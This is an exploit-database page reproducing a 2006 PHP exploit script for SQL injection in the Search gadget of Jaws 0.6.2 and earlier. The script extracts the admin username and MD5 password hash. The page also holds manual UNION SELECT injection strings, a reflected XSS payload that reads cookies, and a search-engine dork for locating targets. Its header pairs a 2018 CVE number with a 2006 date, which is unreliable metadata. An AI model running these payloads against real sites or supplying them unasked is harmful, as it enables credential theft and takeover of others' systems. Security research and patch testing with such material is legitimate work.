Jaws <= 0.6.2 'Search gadget' SQL injection
CVE
Category
Price
Severity
CVE-2018-10417
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
$2,500
High
Author
Risk
Exploitation Type
Date
Ali Hasan Ghauri
High
Remote
2006-07-13
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006070016 Below is a copy: #!/usr/bin/php -q -d short_open_tag=on
<?
echo "Jaws <= 0.6.2 'Search gadget' SQL injection / admin credentials disclosurern";
echo "by rgod rgod (at) autistici (dot) org [email concealed]rn";
echo "site: http://retrogod.altervista.orgrn";
echo "dork: "powered by jaws" | "powered by the jaws project" | inurl:?gadget=searchrnrn";
/*
works regardless of php.ini settings
if 'Search gadget' is enabled
*/
if ($argc<3) {
echo "Usage: php ".$argv[0]." host path OPTIONSrn";
echo "host: target server (ip/hostname)rn";
echo "path: path to jawsrn";
echo "Options:rn";
echo " -T[prefix] specify a table prefix different from default (no prefix)rn";
echo " try blog_ evenrn";
echo " -p[port]: specify a port other than 80rn";
echo " -P[ip:port]: specify a proxyrn";
echo "Example:rn";
echo "php ".$argv[0]." localhost /jaws/ rn";
echo "php ".$argv[0]." localhost /jaws/ -Tblog_rn";
die;
}
# software site: http://www.jaws-project.com/
# manual exploitation:
#
# i)sql injection:
# go to http://[target]/[path_to_jaws]/?gadget=Search
# if search module is enabled, in search field type:
#
# 1%')/**/UNION/**/SELECT/**/0,passwd,username,0,0/**/FROM/**/users/**/WHE
RE/**/id=1/*
#
# or
@
# 1%')/**/UNION/**/SELECT/**/0,passwd,username,0,0/**/FROM/**/blog_users/*
*/WHERE/**/id=1/*
#
# now at screen you have admin username & password hash
# this works with magic_quotes_gpc both on & off
#
# ii)xss:
# http://[target]/[path_to_jaws]/gadgets/RssReader/extras/magpierss/script
s/magpie_slashbox.php?rss_url=<script>alert(document.cookie)</script>
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="rn"; $exa.="rn";}
}
return $exa."rn".$result;
}
$proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...rn";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "rn".$html;
}
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}
$host=$argv[1];
$path=$argv[2];
$port=80;
$prefix="";
$proxy="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
$prefix=str_replace("-T","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$sql="1%')/**/UNION/**/SELECT/**/0,CONCAT('*SUNTZU*',passwd,'*SUNTZU*'),
CONCAT('*SUNTZOI*',username,'*SUNTZOI*'),0,0/**/FROM/**/".$prefix."users
/**/WHERE/**/id=1/*";
$sql=urlencode($sql);
$data="gadget=Search";
$data.="&action=Results";
$data.="&gadgets=All";
$data.="&searchdata=".$sql;
$data.="&searchButton=Search";
$packet="POST ".$p."index.php HTTP/1.0rn";
$packet.="Content-Type: application/x-www-form-urlencodedrn";
$packet.="Accept-Encoding: text/plainrn";
$packet.="User-Agent: Googlebot/2.1rn";
$packet.="Host: ".$host."rn";
$packet.="Content-Length: ".strlen($data)."rn";
$packet.="Connection: Closernrn";
$packet.=$data;
sendpacketii($packet);
if (eregi("Gadget is not enabled",$html))
{
die("search gadget is not enabled... exploit failed");
}
$temp=explode('">*SUNTZOI*',$html);
$temp2=explode('*SUNTZOI*',$temp[1]);
$admin=$temp2[0];
$temp=explode('href="*SUNTZU*',$html);
$temp2=explode('*SUNTZU*',$temp[1]);
$hash=$temp2[0];
if (($admin<>'') and ($hash<>'') and (is_hash($hash)))
{
echo "Exploit succeeded...rn";
echo "--------------------------------------------------------------------r
n";
echo "admin -> ".$admin."rn";
echo "password (md5) -> ".$hash."rn";
echo "--------------------------------------------------------------------r
n";
}
else
{
echo "Exploit failed, maybe wrong table prefix...";
}
?>
original url: http://retrogod.altervista.org/JAWS_062_sql.html
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum